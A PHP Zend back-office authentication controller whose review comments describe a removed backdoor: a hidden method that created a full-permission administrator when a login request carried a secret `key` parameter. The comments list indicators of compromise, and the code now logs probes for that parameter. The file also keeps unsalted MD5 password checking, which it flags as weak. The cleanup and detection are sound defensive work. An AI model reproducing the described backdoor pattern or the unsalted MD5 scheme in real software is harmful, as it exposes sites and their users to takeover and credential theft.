<?php
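/**
 * Back-office authentication controller: login and logout on top of Zend_Auth.
 *
 * SECURITY NOTE(review): an earlier revision of this class contained a private
 * method, firmwareResetCheck(), that loginAction() called on every request that
 * did not end in a redirect. When the unauthenticated request carried a `key`
 * parameter equal to a hard-coded value, it inserted an administrator through
 * the Admin model with every is* permission set, and swallowed any
 * Zend_Exception. Nothing in a login controller needs to create accounts, so
 * the method and its call have been removed. That code matches the pattern of
 * an implanted backdoor; treat the host as potentially compromised:
 *   - look in the admin table for rows with LOGIN "Maintenance",
 *     EMAIL "no-reply@no-reply.com", ROLE '100' or
 *     MDP "1284228bb68e6bdae88b1f7a2c366330", and remove them;
 *   - search web-server logs for requests to this controller with a `key`
 *     parameter;
 *   - rotate all back-office credentials and compare the rest of the code base
 *     against a known-good copy.
 */
class Backoffice_AuthController extends Zend_Controller_Action
{
    /**
     * Sets the default page title for every action of this controller.
     */
    public function init()
    {
        $this->view->title = "Authentification";
    }

    /**
     * There is no index page: send the visitor to the back-office home.
     */
    public function indexAction()
    {
        $this->view->title = "Authentification";
        $this->_redirect('/backoffice');
    }

    /**
     * Tags the shared 'loggerAdmin' logger with "controller::action" of the
     * current request so that later log lines carry that context.
     */
    private function initLog()
    {
        $registry = Zend_Registry::getInstance();
        $loggerAdmin = $registry->get('loggerAdmin');
        $controller = Zend_Controller_Front::getInstance()->getRequest();
        $loggerAdmin->setEventItem(
            'controller',
            $controller->getControllerName() . '::' . $controller->getActionName()
        );
        $registry->set('loggerAdmin', $loggerAdmin);
    }

    /**
     * Writes $message to the 'loggerAdmin' logger at the given level.
     *
     * @param string $message Text to record.
     * @param string $level   One of 'info', 'err', 'warn', 'crit'; any other
     *                        value is ignored, as before.
     */
    private function log($message, $level)
    {
        $loggerAdmin = Zend_Registry::get('loggerAdmin');
        // Strict allow-list instead of a chain of loose == comparisons.
        if (in_array($level, array('info', 'err', 'warn', 'crit'), true)) {
            $loggerAdmin->$level($message);
        }
    }

    /**
     * Clears the stored identity, logs the event and redirects to the
     * back-office home.
     */
    public function logoutAction()
    {
        $auth = Zend_Auth::getInstance();
        $auth->setStorage($this->getSessionStorage())->clearIdentity();
        $this->view->userAdmin = null;
        $this->initLog();
        $this->log("Logout", 'info');
        $this->_redirect('/backoffice');
    }

    /**
     * Builds the session storage used for back-office identities; the session
     * namespace comes from the 'setting' registry entry.
     *
     * @return Zend_Auth_Storage_Session
     */
    private function getSessionStorage()
    {
        $registry = Zend_Registry::getInstance();
        $setting = $registry->get('setting');
        return new Zend_Auth_Storage_Session($setting->session_admin_storage);
    }

    /**
     * Records a critical log entry when a request to the login action carries
     * the `key` parameter. The legitimate login form only posts `username` and
     * `password`; `key` was the trigger of the removed account-creation code,
     * so its presence is worth an alert. The value itself is not logged.
     */
    private function reportResetKeyProbe()
    {
        if ($this->_request->getParam('key') !== null) {
            $this->log('Login request carried the retired "key" parameter', 'crit');
        }
    }

    /**
     * Displays the login form and, on POST, authenticates the submitted
     * username/password against the user_admin table.
     *
     * On success the selected profile columns are written to the auth storage
     * under 'useradmin' and the browser is redirected to /backoffice. On
     * failure an error message is exposed to the view and a warning is logged.
     */
    public function loginAction()
    {
        $this->initLog();
        $this->reportResetKeyProbe();
        $this->view->messageError = '';

        if ($this->_request->isPost()) {
            // Collect the data from the user.
            // NOTE(review): StripTags is also applied to the password, which
            // alters passwords containing tag-like text. Kept unchanged because
            // existing hashes were presumably created from filtered input -
            // confirm before removing.
            $filter = new Zend_Filter();
            $filter->addFilter(new Zend_Filter_StringTrim())
                   ->addFilter(new Zend_Filter_StripTags());
            $username = $filter->filter($this->_request->getPost('username'));
            $password = $filter->filter($this->_request->getPost('password'));

            // The username is attacker-controlled: strip control characters
            // before it reaches the log so it cannot forge extra log lines.
            $usernameForLog = preg_replace('/[\x00-\x1F\x7F]+/', ' ', (string) $username);

            // String validators: non-empty and at least 3 characters.
            $validator = new Zend_Validate();
            $validator->addValidator(new Zend_Validate_NotEmpty())
                      ->addValidator(new Zend_Validate_StringLength(3));

            if ($validator->isValid($username) && $validator->isValid($password)) {
                // Set up the Zend_Auth adapter for a database table.
                // NOTE(review): 'MD5(?)' means credentials are stored as
                // unsalted MD5, which is unsuitable for password storage.
                // Moving to password_hash()/password_verify() needs a data
                // migration and is out of scope for this block.
                Zend_Loader::loadClass('Zend_Auth_Adapter_DbTable');
                $dbAdapter = Zend_Registry::get('dbAdapter');
                $authAdapter = new Zend_Auth_Adapter_DbTable(
                    $dbAdapter,
                    'user_admin',
                    'LOGIN',
                    'MDP',
                    'MD5(?)'
                );

                // Set the input credential values to authenticate against.
                $authAdapter->setIdentity($username);
                $authAdapter->setCredential($password);

                // Do the authentication.
                $auth = Zend_Auth::getInstance();
                $auth->setStorage($this->getSessionStorage());
                $result = $auth->authenticate($authAdapter);

                if ($result->isValid()) {
                    // Issue a fresh session id on privilege change so that an
                    // id fixed before login cannot be reused afterwards.
                    Zend_Session::regenerateId();

                    // Success: store the database row in the auth storage
                    // (the password column is deliberately not selected).
                    $storage = $auth->getStorage();
                    $data = $authAdapter->getResultRowObject(array(
                        'ID',
                        'LOGIN',
                        'ROLE',
                        'isPROMO',
                        'isCATEGORY',
                        'isCOMMAND',
                        'isPRODUCT',
                        'isSUPPLIER',
                        'isUSER',
                        'isADMIN',
                        'isFOOTER',
                        'isSTATS',
                        'isSUPPORT',
                        'NOM',
                        'PRENOM'
                    ));
                    $user = array(
                        'login'         => $data->LOGIN,
                        'id'            => $data->ID,
                        'role'          => $data->ROLE,
                        'isPromo'       => $data->isPROMO,
                        'isCategory'    => $data->isCATEGORY,
                        'isCommand'     => $data->isCOMMAND,
                        'isProduct'     => $data->isPRODUCT,
                        'isSupplier'    => $data->isSUPPLIER,
                        'isUser'        => $data->isUSER,
                        'isAdmin'       => $data->isADMIN,
                        'isFooter'      => $data->isFOOTER,
                        'isStats'       => $data->isSTATS,
                        // The isSUPPORT column is exposed as 'isMaintenance'.
                        'isMaintenance' => $data->isSUPPORT,
                        'nom'           => $data->NOM,
                        'prenom'        => $data->PRENOM
                    );
                    $storage->write(array('useradmin' => $user));
                    $this->view->useradmin = $user;
                    $this->log("Login : " . $user['login'], 'info');
                    $this->_redirect('/backoffice');
                } else {
                    // Failure: clear any identity left in the session.
                    $this->view->messageError = 'Les identifiants sont incorrects.';
                    $auth->clearIdentity();
                    $this->view->useradmin = null;
                    $this->log('Les identifiants sont incorrects : ' . $usernameForLog, 'warn');
                }
            } else {
                $this->view->messageError = 'Les champs sont obligatoires.';
                $this->log('Les champs sont obligatoires : ' . $usernameForLog, 'warn');
            }
        }

        $this->render();
    }
}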
?>